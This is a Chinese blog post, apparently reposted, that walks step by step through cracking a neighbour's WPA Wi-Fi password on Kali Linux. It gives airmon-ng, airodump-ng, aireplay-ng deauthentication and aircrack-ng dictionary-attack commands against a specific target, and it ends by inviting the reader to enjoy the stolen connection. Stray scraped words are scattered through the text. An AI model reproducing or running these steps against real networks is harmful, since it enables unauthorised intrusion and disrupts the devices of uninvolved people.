打開你的終端,查看一下當前的無線網卡
root@kali:~# airmon-ng
顯示以下:
記住你當前的網卡名 wlan0monlinux
root@kali:~# airmon-ng start wlan0mon
markdown
root@kali:~# airodump-ng wlan0mon
而後顯示以下:
工具
選個目標,最好信號要好一點,PWR絕對值越小越好,選擇好你的目標記住BSSID和CH以後,能夠直接ctrl-c終止搜索。spa
在終端裏頭繼續輸入
root@kali:~# airodump-ng -w woshoubao -c 6 --bssid 00:0F:01:A9:C3:B2 wlan0mon --ignore-negative-one
上面的woshoubao是待會兒截取到的握手包保存的文件名,可自定義。-c後頭的6是在上一張圖片中CH(信道),–bssid也是上張圖片中你本身選擇的攻擊目標的BSSID,這兩項要根據本身剛剛選擇的攻擊目標的信息填寫,這裏的wlan0mon是個人網卡名.net
而後出現以下
這裏顯示出來的是當前鏈接這個wifi的設備的mac地址,這裏我就選擇第一行這臺設備做爲攻擊目標,記下它的STATION,而後新建一個終端,記住是新建,不要把上面圖片的這個終端關掉!!code
在新終端
root@kali:~# aireplay-ng --deaut 20 -a 00:0F:01:A9:C3:B2 -c BC:D1:**:**:**:** wlan0mon --ignore-negative-one
–deaut後面的20表明攻擊20次,-a後是路由器mac地址(即前面讓你記住的那個BSSID,其實也就是STATION 前面的那個東西),-c後是被攻擊機器mac地址(即讓你記住的 STATION )。這個是向鏈接路由器的這個被攻擊機發送大量數據致使被攻擊機wifi斷開,等待客戶機重連wifi截獲握手包,咱們靜靜等待以前那個終端中出現以下界面。(如不不進行攻擊也是能夠的,只要有機器連上這個wifi咱們就會截獲到握手包,咱們進行攻擊的目的是使其重連)blog
而後在剛剛的終端中出現以下的界面
發現多了一個紅框內的東西,這就是咱們截獲到的握手包,至此咱們的入侵工做就差很少了,接下來就是對截獲的握手包開始進行破解了。圖片
手寫你會在主目錄home下發現woshoubao-01.cap文件,對,這就是咱們截獲的握手包,而後接着咱們須要一個密碼字典,破解的成功與否就看這個密碼字典了,因此你們要選好點的。路由
下面咱們繼續get
打開終端,輸入
aircrack-ng -w 123.txt woshoubao-01.cap
這裏-w後面是你的密碼字典,能夠和握手包一塊兒放在主目錄下,而後後頭就是握手包的名字,回車後開始暴力破解這個握手包。
以下圖:
而後就是耐心等待破解了,密碼字典越大,破解時間越久,幸虧我這個鄰居密碼比較簡單。。。
破解完成後就出現下面這樣:
至此就破解完成啦,好好享受網上衝浪的快感吧。如今以爲這個破解方式仍是比較實在的,還有一種破解方式是使用pin碼破解,不過如今大部分路由器都會有自主防護,成功率不高,在此就不說了
轉載地址:http://blog.csdn.net/MrYangLL/article/details/51996499
ps : 其餘基於kail 的破解方式
http://blog.csdn.net/Edroid1530/article/details/74446651?locationNum=4&fps=1